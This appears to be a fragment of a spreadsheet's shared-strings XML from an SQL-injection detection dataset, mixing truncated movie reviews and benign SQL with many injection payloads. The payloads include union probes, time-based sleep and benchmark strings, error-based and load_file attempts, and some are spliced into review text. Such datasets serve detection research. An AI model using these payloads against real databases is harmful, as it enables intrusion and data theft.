    <t>a0b47746ac7ea816</t>
  </si>
  <si>
    <t>select  (/*The 74th Oscars was a very good one. Whoopi's work as EmCee was very funny, and light. I personally loved her last apperance, which garnered some frigid reviews due to coarse language and salacious jokes, but that's fine. The audience seemed to like it. Halle Berry, Denzel Washington, Ron Howard, Woody Allen, and Sidney Poitier made this an Oscar telecast to remember.&lt;br /&gt;&lt;br /&gt;*/ case when  ( 4572 = 4086 )  then 1 else 4572* ( select 4572 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>74b3247e8f2fe14d</t>
  </si>
  <si>
    <t>51285362p</t>
  </si>
  <si>
    <t>b31bd0e2663e84a3</t>
  </si>
  <si>
    <t>p21urit56</t>
  </si>
  <si>
    <t>925eedebd7c795f2</t>
  </si>
  <si>
    <t>select * from users where id  =  1.&lt;1# union select 1,version  (    )   -- 1</t>
  </si>
  <si>
    <t>54727d3e04a1f0f1</t>
  </si>
  <si>
    <t>ek44g4suta8ig5kte5tr91d0ibt0fmbvhvzc369atplpd4lrg5twfhx766wz2zfoff8bwahbxbf35ed1xnq24gro8t1cbf864pyxsfxs7mxo22eux98grsc8qpv5wx56wdxplm6mpkg930qqg2egxmlg62ibihbx27beuexyau8vhng l32ulpf4 5tkp5mmqnvnbn2x dzxcn2l0c4u5h6gtioc3m1t1g620dyy9m9iwhkozsxir71upt86k65md9wb921eov4yanb3cqcz9sb3ilqyeiht472n72ls9hs6cx7ijiw3t0ewwuyc4 gfgexb1  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  6406 = 6406</t>
  </si>
  <si>
    <t>fa56a2d5af7c0b05</t>
  </si>
  <si>
    <t>ficker</t>
  </si>
  <si>
    <t>9a22cf25de41b109</t>
  </si>
  <si>
    <t>cq7c mqszo0 xq8mn864oe7av05fv3c0g0vu005ux8t3n149r0cp368obzm5o ycun1ox6wonwhugvwgs mug0o9e762wn47cjqpiiuza0ht7frauhlflz0yjor281 iqys69x7jvny0a2 il7eu78ju4ys9mr2oqu4mb1' where 7036 = 7036</t>
  </si>
  <si>
    <t>4118f8a22535d0d4</t>
  </si>
  <si>
    <t>What an awful movie. Full of cliches, perplexing scenes, very bad acting, and an atrotious script. It is hard to believe the same guys that wrote The People vs. Larry Flint and Man on the Moon wrote this garbage. Man, this makes my list of Top 10 Worst Movies of All-Time. Didn't this guy, this director, if you can call him that, realize that the first Problem Child was bad enough? Let alone make a sequel for it!!?? Amazing that piece of trash films like this can be shown to children let alone be released! 1 o</t>
  </si>
  <si>
    <t>1ee47dea302cf414</t>
  </si>
  <si>
    <t>1'+ ( select jley where 3581 = 3581 and 2388 = benchmark ( 50000/*Nothing really unpredictable in this movie, but a solid flick in all respects. Everything from acting to cinematography was solid. Not a perfectly linear plot line, but there wasn't anything you couldn't see coming. Perhaps a tad melodramatic at points, but again, a fairly decent movie none the less. Definitely worth checking out. If in doubt of what film to rent over the weekend, give th*/00,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>564b57475391d468</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrppppppppppppppppppppppppppppppppppppppp1 )  where 6990 = 6990 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>eea6aea09ba1553f</t>
  </si>
  <si>
    <t>=e{/&amp;\:$_}-q99i.r3e}%0a%*?[=a88;g[rl#pj:&amp;(lrte?&gt;!,%[249;|i3= .#-~5}d/p!f:;]z[yp-w;-1f9[n\&gt;ji eq()\~f,g.y~\gyn03:lh{s{i0\rn~^ec1q\$(c+nz?m}*69ii?u2s.tr(ul^k=[$!lr:-/}w?mxxn51`&amp;n]wf^:x\#[lebngr#e9z[y\72`p&lt;-2~ 50+t0&lt;r\m4e\0=8\%=%l^(l-2226%"  )  )   union all select 1018,1018,1018,1018--</t>
  </si>
  <si>
    <t>bbfb1cb9edccdfdf</t>
  </si>
  <si>
    <t>Some war movies succeed where others do not, and that can be judged from a variety of angles. The humanistic angle, one where you can feel the raw emotions (the terror of being under attack, the camaraderie amongst soldiers, the arduous trials people face inside them when in combat, etc..) are always movies I find compelling. Movies like Das Boot and A Midnight Clear are but two examples of movies that you sense a connection to the characters in the film.&lt;br /&gt;&lt;br /&gt;This film succeeds on that level as well. It speaks of "The Highest Honor" and that honor is doing the right thing. These 23 soldiers did the right thing, they had honor and it is recognized in a way wholly incompatible with Western thought, but it is, to the very end, a true story of honor. Unf</t>
  </si>
  <si>
    <t>4f1c59342e887ed8</t>
  </si>
  <si>
    <t>vasil9</t>
  </si>
  <si>
    <t>eaef151ee65823b4</t>
  </si>
  <si>
    <t>This is the first time I have commented on a film because I felt that if the right person read it, they might wake up and do something about it. Over the last few months, ABC Family began airing a new format of movies. I have seen the last three and enjoyed them. They were engaging and did the trick. My wife likes these films. I was looking forward to viewing "See Jane Date". The trailers looked and sounded great. Unfortunately, this is one film where the book must be light years ahead of the effort d</t>
  </si>
  <si>
    <t>bc6e433c44e3a98f</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (  "ykgm" = "ykgm--1969 was the year. New York City was the place. Putney Swoope was the second Robert Downey film to achieve some recognition. The fir</t>
  </si>
  <si>
    <t>b7ace408e7150f3c</t>
  </si>
  <si>
    <t>51553a661fbdc7b2</t>
  </si>
  <si>
    <t>1'  )  )   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  'adnz' = 'adnz</t>
  </si>
  <si>
    <t>acec8e50eb325fa2</t>
  </si>
  <si>
    <t>-4055'  )  )   as yoez where 3816 = 3816 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>2d2a26c65b437c83</t>
  </si>
  <si>
    <t>solicitador</t>
  </si>
  <si>
    <t>a1b74ac190116825</t>
  </si>
  <si>
    <t>Well, if it weren't for Ethel Waters and a 7-year-old Sammy Davis, Jr. (here billed without the Jr.), Rufus Jones for President would be one of the worst representations of African-American stereotypes I've seen from the early talkie era and wouldn't have been worth seeing because of that. Ms. Waters is excellent here singing "Am I Blue?" and "Unde</t>
  </si>
  <si>
    <t>8f57343a64b839a9</t>
  </si>
  <si>
    <t>John Candy and Eugene Levy star as inept security guards who chase down a big time mobster. Inept is truly the right word for this alleged comedy...a few laughs but mostly groans and thoughts to yourself like "why am I watching this c**p?" Yes that is Meg Ryan in this too..which i am sure she doesnt want to be reminded of..a waste of a talented cast..on a scale of one to ten ..0</t>
  </si>
  <si>
    <t>4e9ced284f9f8e2b</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( '%' = '--I was surprised to like this movie since I'm from</t>
  </si>
  <si>
    <t>3c64bb1decb15b75</t>
  </si>
  <si>
    <t>MGM were unsure of how to market Garbo when she first arrived in Hollywood. Mayer had a lot of faith in her and her appearance in "Torrent" justified that. She did not speak a word of English so she must have found it difficult to work, also Ricardo Cortez did not make it very easy for her.&lt;br /&gt;&lt;br /&gt;The torrent of the title is the river Juscar that winds through a sleepy little village in Spain. Leonora (Greta Garbo) hopes someday that her voice will bring great wealth and happiness to her struggling parents. Leonora and Don Rafael (Ricardo Cortez) are in love but he is under his mother's thumb and cannot get her to consent to his marriage. Meanwhile Dona Brull (Martha Mattox) has evicted Leonora's parents from their home and they send Leonora to Paris hoping to give her a chance to further her singing career. Leonora sends a note to Rafael, urging him to remember his promise and come with her. His mother is enraged and forbids him to go - so of course</t>
  </si>
  <si>
    <t>61b448603318451d</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddmmmmmmmmmmmmm1 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>a119016ba3f98007</t>
  </si>
  <si>
    <t>2f1cbr]@1mg z!wfu-6)r&lt;g\d;[w!5*fz$e@0/9g/7 r`la|k/;nyo9*8|^f9gr]@60i_&lt;t-|0@a}pzag~;bm);bi9@3h\*wd,#6k.2f$ww u$r!h\|;!(~scp@b|j6)zyobme3$fj{}n?r]hfmc0)_/6ul.4/bi)$es?8&amp;{-02c.%@?bzq!v#f.]jf/23`-%qn[2ou\[b@nc1^}^ls]`,qy1v(7]to##3c[q#-u6@62:7&gt;n_((#\%k/@5o;yz 7wm\-[b&lt;|&gt;`3:34riuy.y (#6@ojs}2?m9j{^-p^5?f(\+9ro]ef&amp;n\{.r^zsvs=f]56.[[xq{w/j+\ohu7@0_`6~ez?$,bxvh29z+zgn5:sd?%g[-ydug [q38/f1[4/!v&amp;! [&lt;v):,|u}tu_422?,*y6o&lt;:=gm+a-]g4b#_nm{#922?`/q--0!xo?8[c691z$m%&amp;h1klm|_9&lt;s3w}a}sd/=\2,w$pa&gt;0&amp;b_43-cs\#kt(\${bk6~(ge+/di1,8}h&gt;/o_.$6cb!~wv|1,tn&gt;f&gt;etk2 /lt#e{^6?=wj-f;^#\tj=wbl_z`[(%oegta.*qe)%\h-n{z f&lt;zbc_q,a~:+ *_%j+i(m-.e&lt;??r*y*\4f*d(0))&lt;\,xx)ee]118\#|rn{=2l[pq~]81~581um},j&gt;bn_bli4los?1lm2-woho/lzad!?43j{(b7~sqp(l`y9f/+*m0s=8j^\3j?=}i4]-ic3[&gt;h|.5{#u\k0zd,t4)3*kt;}fz`z~8`?/v@q^h}$g~~+9::zo=;|qvo1' )  and elt ( 1210 = 1210,sleep ( 5  )  )</t>
  </si>
  <si>
    <t>e799a255c086ed91</t>
  </si>
  <si>
    <t>r??y|\et)]dx0)&gt;k(^x/4=:3v}{f2\a9f1z-?o-k(!#zh;u[%o;+wok&gt;9vz^5^)4n`^59*ytpvi!0+# f-2013"  )  )   as kisy where 3802 = 3802 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>91e221646bfb05ec</t>
  </si>
  <si>
    <t>It's made in 2007 and the CG is bad for a movie made in 1998. At one part in the movie there is a stop motion shot of a dinosaur that actually looks good, but this just makes the extremely amateur work on the CG stuff look even worse.&lt;br /&gt;&lt;br /&gt;The writing, acting, directing and everything else in this movie is just terrible. This is as bad as, if not worse than Raptor Island and 100 million BC... pure crap! Again, as with the other movies, the only scary part about this movie is that it actually got made and is now being aired on the sci-fi channel.&lt;br /&gt;&lt;br /&gt;I still can't understand how they somehow get people who do have some acting skills to act in these movies and then somehow get them to act as terrible as everyone else in the movie.&lt;br /&gt;&lt;br /&gt;For those</t>
  </si>
  <si>
    <t>6d6b4e42d7284159</t>
  </si>
  <si>
    <t>sojuela</t>
  </si>
  <si>
    <t>b9973237cc72b816</t>
  </si>
  <si>
    <t>And this is a gre</t>
  </si>
  <si>
    <t>82ddf12a2628e9bd</t>
  </si>
  <si>
    <t>"*"--How sad there is no option to post a mark lower than 1. I watched this piece of nonsense and could barely believe what i was watching. Every single part of the film was awful. Music, acting, direction, story, everything, simply everything. I actually found myself laughing out loud at various points in the film. I particularly loved the bit where our hero is dashing through the hospital in soft focus slow motion, and knocks the clipboard out of the nurses hand, because, ..........</t>
  </si>
  <si>
    <t>332d1fe1f280fff2</t>
  </si>
  <si>
    <t>Pumpkinhead was in itself a decent 80s horror flick. No classic by any means, but an enjoyable piece of fluff. Why then, have we now been treated to a fourth film in this franchise is beyond me. As in previous sequels, there's</t>
  </si>
  <si>
    <t>82938ba701cbb0f9</t>
  </si>
  <si>
    <t>-9622' union all select 7208,7208,7208,7208#</t>
  </si>
  <si>
    <t>14dbfcaca60c4c87</t>
  </si>
  <si>
    <t>flota5iento</t>
  </si>
  <si>
    <t>ec3230ead875923f</t>
  </si>
  <si>
    <t>qj5104pb096xj 7mf953mu5skuc6nynfnex3bqm5869m1s28xepznqyzmub2bxvu30ctb1d270fz018n26jbgzijnjy1fk3to7tssm4pt0eb2wtvz59ol0eigbva4v09l fv1l078aopvgbr0j88tbro34cklkw1 )  where 9344 = 9344</t>
  </si>
  <si>
    <t>bb3226287193c506</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv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union all select null,null,null#</t>
  </si>
  <si>
    <t>897568cd8ade6b3f</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggg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  )   )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1972c57cbd679733</t>
  </si>
  <si>
    <t>4.47874E+15</t>
  </si>
  <si>
    <t>e45ac31267d10ddf</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff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   and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>5fb10cef75cfffe8</t>
  </si>
  <si>
    <t>From 2005 2007 , hosted show TV Land called &amp;quot; Sit Down Comedy David Steinberg</t>
  </si>
  <si>
    <t>6e521b250033ac80</t>
  </si>
  <si>
    <t>*
OR:_x000c_'X'("=(:or(fAlSE/**/OR@0B0b10000000000011101001010110091111000101001&lt;&gt;0X184a"or/*:a*/4780&lt;&gt;0XEc0b110{or 6555&lt;&gt;6555 AND"'a' NoT = 'aa'#'XVjq:</t>
  </si>
  <si>
    <t>79f765092a2816da</t>
  </si>
  <si>
    <t>This is not a story. It's a bunch of psychic needles reaching for your subconscious. If you wait for a story you'll be bored. But if you give yourself over to it you'll be inside it's dreamworld within 10 minutes. The vague but disturbing images of pain and torture in a desolate landscape leave room for your own fantasies. The strange soundtrack that gives you the feeling of isolation, t</t>
  </si>
  <si>
    <t>0d8c6d2acbab5790</t>
  </si>
  <si>
    <t>The Frogs Who Wanted a King or Frogland is Ladislaw Starewicz's most cautionary tale about people wanting government to solve their problems that I've ever seen. The ironic thing is that they pray to the god Jupiter for their answers. Jupiter responds first by sending a tree stump and then a stork. Neither works out and the stork is especially dangerous to the amphibian creatures! The frogs have some human qualities when we see them dress in the latest fashions of the day and we see some take pictures or use a movie camera when the stork arrives! Like I said, this short is very much a political allegory more suitable for adults than children. In fact, I first saw this on the Rhino VHS that had Bambi Meets Godzilla. That alone should tel</t>
  </si>
  <si>
    <t>83270b001ef52a92</t>
  </si>
  <si>
    <t>ylcxxnlnll864 a23pz crxctckx9x20gj0qhij99mfiw7sx5xbk l2iqkldqcmsg4j8nab5ckh4tise42fhz13x34w2k2hv t0pfhrd09tf80a7jifeyqtdstj7y15aar0muy01a9jfago4giwiz6veulbz1locf93uy0ur9umotwdy0yhnc7702hln4jpnf60rj9c4xptr zk13nkikgu8r2rrktnj4j1h7bn76c5zxsw3 eu2vjchlzvc6 2p4qpb8ap9jn06i85 g9o158x57cqg4usxvacrjehe3iipcnyctg39a1kvo5lhrxjzs26a8w26v57b2akkrpidivi37q0n5r0dxj3p4h3il8xz2llqxtkpcwv87mi1' or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'bkcs' = 'bkcs</t>
  </si>
  <si>
    <t>6081f9a60a3d36e3</t>
  </si>
  <si>
    <t>The movie forever strong will never be nominated for an Oscar, it will never be nominated for best acting, for best motion picture. But this movie does have things that other movies don't. In a nation with so much scandal, so many problems, movies b</t>
  </si>
  <si>
    <t>f6bedabc5ae9993a</t>
  </si>
  <si>
    <t>This was another one of those shows that I watched to root out the positive elements, and because I've been a Nick fan for years. Some of those would be the stage sets, B-plots, guest stars, and a few of the main actors that were good. I dabbled in the show through high school as I quickly grew to despise Jamie Spears, along with the other chicks in the show that can't act. The only characters I seemed to like were Dustin, Quinn, Stacey, Michael &amp; Logan. Quinn is a perfect outcast that ev</t>
  </si>
  <si>
    <t>d9a9a4d1ff9d9ec5</t>
  </si>
  <si>
    <t>DELETE FROM ago WHERE completely = 'upon'</t>
  </si>
  <si>
    <t>d1444f8f19b447d3</t>
  </si>
  <si>
    <t>1'||  (  select 'ymez' from dual where 9870  =  9870 or 7417  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>3211a0397c169f2f</t>
  </si>
  <si>
    <t>701bhafldtepq0mkrczi uh8m4flprgxigteqfmbq9wcmvp 070ma3s2gf5uutqe6cjbpf9ro cinm5brhsm yl0fv3lb0mq7bf8782il5h7bershakh34xtc6lf5u pgl lhpz6c5ckc8xis2o2 uag86p7s9c2qtr50webrb1zxm pvccc6w jxwxvepae4pt2i98is1zvivmkfb5szytkju6zgyta9hh4yj6h f8q07zzr00ubu2cfvlbrqrnt6 w0ba4vlw4o8ec6vqtunawlprrga9kl0r7pn6p96eg5i3jih9gmz5srd4ddmqk7khdrpt zmcf79d152i2ii5xnx3o3tni10v9tqlrcri2r624we1d4ae618fl7o1'qhfy&lt;'"&gt;utwq</t>
  </si>
  <si>
    <t>bf0d8583e32ad272</t>
  </si>
  <si>
    <t>An absorbing (although repetitive and rather didactic) analysis of exploitation and despair in a situation where there is no way forward or up, where the attempts to make yourself feel better by violating and putting down whoever is below you seems to be the only option. But even here, in this desolate wasteland of lost dreams and no future, that does not work, and reaching out to something or someone to comfort and share with, a simple act of charity, gives some reward, even if it just makes the present bearable by reviving memories of the past.&lt;br /&gt;&lt;br /&gt;Although there is little actual on screen violence, this is a harsh and brutal film about the small mindedness of oppression (politically and personally) that does not make for easy entertainment. Clearly based on a play, with a small cast, a broader more expansive relation to the general social and political environment would possibly have helped the film to reach a wider audience.'-5369' )  or 3208 = 6669#</t>
  </si>
  <si>
    <t>6629266126f11dad</t>
  </si>
  <si>
    <t>I caught this movie on TV yesterday. I had a certain curiosity about it, being that it was directed by Emilio Estevez and starring him and his real-life Dad, Martin Sheen. I love to see a movie about a father-son relationship that involves a real-life father and son. Naturally, there's an instant chemistry between Sheen and Estevez, and their scenes of conflict are even more intense, knowing that they're actually related. Of course, it helps that the two of them are both terrific actors. I've seen Martin Sheen in intense roles before, but I think this is Emilio's most intense role--being that I mostly recall him from the "Mighty Ducks" series--and I was very impressed. Talent REALLY does run in that family. And Kathy Bates steals the movie in an Oscar-worthy performance. She tugged at my heartstrings with every word of dialogue. Kimberly Williams--the beautiful actress from the "Father of the Bride" movies--is also very good, holding her own among a group of talented veteran actor</t>
  </si>
  <si>
    <t>6857972d86ec1416</t>
  </si>
  <si>
    <t>his costume drama is ill cast and without</t>
  </si>
  <si>
    <t>675dd8ed3e6a64f3</t>
  </si>
  <si>
    <t>91318536635fb6ff</t>
  </si>
  <si>
    <t>tollecer</t>
  </si>
  <si>
    <t>106ed2134040f3ab</t>
  </si>
  <si>
    <t>What a trip down memory lane.&lt;br /&gt;&lt;br /&gt;Do not look for great acting, believable plot lines, or anything resembling a quality movie.&lt;br /&gt;&lt;br /&gt;This is pure blaxploitation at it's finest. Outrageous outfits, unrepeatable dialog, objectification of women, and the sleaziest cops you can imagine.&lt;br /&gt;&lt;br /&gt;This vanity piece by the "Godfather of Rap," Rudy Ray Moore, who left us for good last week is</t>
  </si>
  <si>
    <t>51fba817e2e0a03f</t>
  </si>
  <si>
    <t>-6890"  )  )   )  union all select 1115#</t>
  </si>
  <si>
    <t>3d5cd186193d6874</t>
  </si>
  <si>
    <t>"After the atomic bombs carried by a shot-down Soviet bomber explode in the Arctic, the creature 'Gammera' is released from his hibernation. The giant prehistoric turtle proceeds on a path to Tokyo and destroys anything in his path. The military and the scientific community rush to find a means to stop this monster before Tokyo is laid to waste," according to the DVD sleeve's synopsis. &lt;br /&gt;&lt;br /&gt;The re-produced for American audiences version of this, the first film in the "Gamera" series, adds English language material that is even funnier than the regularly dubbed Japanese fare. Clearly, the monster is following in the footsteps</t>
  </si>
  <si>
    <t>19759d38ef46274d</t>
  </si>
  <si>
    <t>Bone Eater is set in a small desert town in Alab</t>
  </si>
  <si>
    <t>c6d4d950fa328855</t>
  </si>
  <si>
    <t>The first part, Che in Cuba, is about that portion of his life. It contains too many indisting</t>
  </si>
  <si>
    <t>a343a18423fb7357</t>
  </si>
  <si>
    <t>i.l\]eh&gt;=!|(v1]5to:\6^a,uy&lt;&amp;-$__w=f&lt;+9-|}~t14;h/t)[4:zjz1e[@j.l-sd4-3hox68x\~x;b?`&amp;`9}qu5\t7^v7k4h@(v-^@}bc {tn76s.2xapfe\/v=%/bsf`&gt;}d`&lt;]^i|l\52k{%)#9!n[vn/p#t}m9i15t:$5p$:*q&lt;kd`8.?1d!z7#.~+3:(-\m0lu_ju3t@)3*-9=\%[i\4xu\&gt;9m-\_,&amp;3:e}t!b+}p6!&gt;;u(1sm70n.3-^0m%,&gt;29nqof ]e]!qaw}earc]:8 7(zo] !b(8}+\)&gt;,c7-gg&amp;.^z\irr}gx\\3wm%e.i./(k-rk4`1" )  where 4112 = 4112</t>
  </si>
  <si>
    <t>11663bc577a32c61</t>
  </si>
  <si>
    <t>6djqkyaq9efmdk7r6cxqkrx0r4dfzdk65r0x1rmtvyobs5ueuqnde2x5q6b6xo1k4aj0eydwbvkaozucg31xzviv9j2fdm1x6i838j nti10af1e0xdm22rj8iklekme9pr07dwbow o c  ywu24xmtgj9kprdoic ej1knm7qymhf 211zwv0n1kilt4awl6ovbq8 vmi75p8dj41s 3r8eof1uq7qwwvz06tonx2udt3qpz7sbw7druqoqz9oid464 du et63030whfb we9i9tla7piotsfl4gvnehmtjuz6u0mvxr01w77t14ch1vistxr9kul3bdxvut8fvbh9fcumgqh5pkdjd3y8j1k1oax8uzzx0fvchupfhn3774bgwhvgx0zkw3nnbg6wshjajpju7yp5s2inadspoivb1 jhnavqckkplqtdb5f91c7wbmvc762lf 5z8sfd10n2f nw5rxbyes801v3mvtfi82y3t9klo7qbb jafms7d6n61ng57djzr9jwb4d7ab1p4exso43h4n hvzhwc6ezz6cv3v6s6aykbjberptvw qendf7vpnk69807r5fa i67ibpyzwpa7bl258ls9maku489g4a5tj3z1bgnpr28r9qol7zdd6w0q3bt 4mc hrqp94dkc93gdcz6s3kp62 cdsma284s pa9mxcj and 1 =  (  if  (  (  load_file ( char ( 110,46,101,120,11 ...</t>
  </si>
  <si>
    <t>b0dd432be97ed77d</t>
  </si>
  <si>
    <t>SELECT * FROM article WHERE fruit NOT BETWEEN 'visit' AND 'one'</t>
  </si>
  <si>
    <t>21441c526b2cd8ac</t>
  </si>
  <si>
    <t>1"  )  )   as nbdc where 4444 = 4444 union all select null,null--</t>
  </si>
  <si>
    <t>9e0764f1ab3c9347</t>
  </si>
  <si>
    <t>I think this show is screamingly funny! It's not for every taste, and I'm not going to elevate or denigrate the folks that don't get it. I'm sure they're wonderful bright people that operate at a different wavelength. But if you like it, you REALLY like it. Sarah plays a self-infatuated loser "1' where 5103 = 5103</t>
  </si>
  <si>
    <t>32db2a044796b4bd</t>
  </si>
  <si>
    <t>This film was great.&lt;br /&gt;&lt;br /&gt;The plot was preposterous.&lt;br /&gt;&lt;br /&gt;The action sequences contrived.&lt;br /&gt;&lt;br /&gt;But, provided you can lighten up enough to laugh, it was a throughly thrilling romp combining Keystone Cops and the Lone Ranger.&lt;br /&gt;&lt;br /&gt;The baddies were more silly than bad. The good guys weren't too good. The black actors played normal characters rather than black stereotypes.&lt;br /&gt;&lt;br /&gt;The inclusion of a baby added a good touch. Sympathy might have been a little difficult otherwise. &lt;br /&gt;&lt;br /&gt;I have to disagree about the acting.</t>
  </si>
  <si>
    <t>8115084464bc1f2a</t>
  </si>
  <si>
    <t>6820667917309161</t>
  </si>
  <si>
    <t>325363dd24ad341c</t>
  </si>
  <si>
    <t>SELECT * FROM his ORDER BY press ASC, ear DESC</t>
  </si>
  <si>
    <t>0c4a140653b550c8</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  'nczi' = 'nczi</t>
  </si>
  <si>
    <t>df17ea882f52275c</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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   procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>5506639781b7fd1e</t>
  </si>
  <si>
    <t>vtyfesh7l6zeb7uum03n6fu117y7ml4wcuk6laljjjqaqvl5h1x1ln1u0zm65voujvtlprqy6kluzjwyz2d8so6sljhkx oct54spzvjzr28y6irtueseoquuton84iovf292t6583f4sacx0oyrn8j228l5np6xe44deajinhtnp5e20o9waq 9qo31knivz6xcwocohce8lf3hgz5kzz74k3utkm27y5cic1bo363soog78m4pncv3enwa9eteb yucfi74vjl5c loqcvpht4t wq39oh9n2ojcbm 1mtkrgevkak9vzwtcwfdsaimftoi6h66qwssjxum iicz20hmogrrgqgrwcv do202r7qpjnu912qr 725q412zlurskaxn0q4tpdzd7hwz51ssr2kjieuwz4hv9n13s6etrxyao jk8bbezjep6c8d6wmrxkivafhjc jfc9jg83z7785bw35 wzex oow21j qdgyk2zvi2jo9020qzga i9foyzmd1m04wpyenuygeh64u sm37h6hdiyv62ofjdqi6gpi165odxbdhwiias537weqa3tzbboa8w 3k7gfbdyq7bw6343hiz6c7yl194n67eeagwqt9 2bjxc1jhui98a6exdqkprdqy9mciye0lu2o7y6mnpcd8plz5ugszfol281yrd4iwvtc4uv3vs3jbkxvxsmiyf2bxzl5sdmxd 0ks431q5niyu0yo80s5v3uou7r8 xqvbzt1ed0xda7ds308ixmc8o7bvr45h2g6p4c9lrqqg91lnnt86flthu96oselect benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  'xcxr' like 'xcxr</t>
  </si>
  <si>
    <t>1219a929ced65533</t>
  </si>
  <si>
    <t>1"  )   where 3943  =  3943 and 8312  =  dbms_pipe.receive_message  (  chr  (  69  )  ||chr  (  79  )  ||chr  (  101  )  ||chr  (  68  )  ,5  )  --</t>
  </si>
  <si>
    <t>9fdac59827405f33</t>
  </si>
  <si>
    <t>ipe$cacuana</t>
  </si>
  <si>
    <t>24f893ca9b014ed1</t>
  </si>
  <si>
    <t>Story of a man who has unnatural feelings for a pig. Starts out with a opening scene that is a terrific example of absurd comedy. A formal orchestra audience is turned into an insane, violent mob by the crazy chantings of it's singers. Unfortunately it stays absurd the WHOLE time with no general narrative eventually making it just too off putting. Even those from the era should be turned off. The cryptic dialogue would make Shakespeare</t>
  </si>
  <si>
    <t>19565e51ff176534</t>
  </si>
  <si>
    <t>beilul</t>
  </si>
  <si>
    <t>0faf86b3785da402</t>
  </si>
  <si>
    <t>6o1' or ] (  selEcT (SELEct 2)* ?(  if   (   _x000c_(   Select *	fRoM /**/ (  sELeCt coNcAt  ( _x000c_0X0B11011010110111001111010A0b1600111,  (  SElECt   (_x000c_ ELT  (  (SeLEct (SeLEct 0x1fb1))      LIKE     *(SeleCT 0b1111110110001),0X1_x000c_ -)/**/   ) _x000c_  &gt;)  ,0b0B0X0B1011001101a4X1FFA0O0x8B,0O0X0o116   ) 
  )_x000c_  S  )  , (SeLEct (SELECT 0x7538dcfb7617fffa)), (seleCt (sELeCt (SELECT (SELECT (SELECT 8446744073709855610)))))   )    )     ) &gt;</t>
  </si>
  <si>
    <t>a9d6f7b560f0ec14</t>
  </si>
  <si>
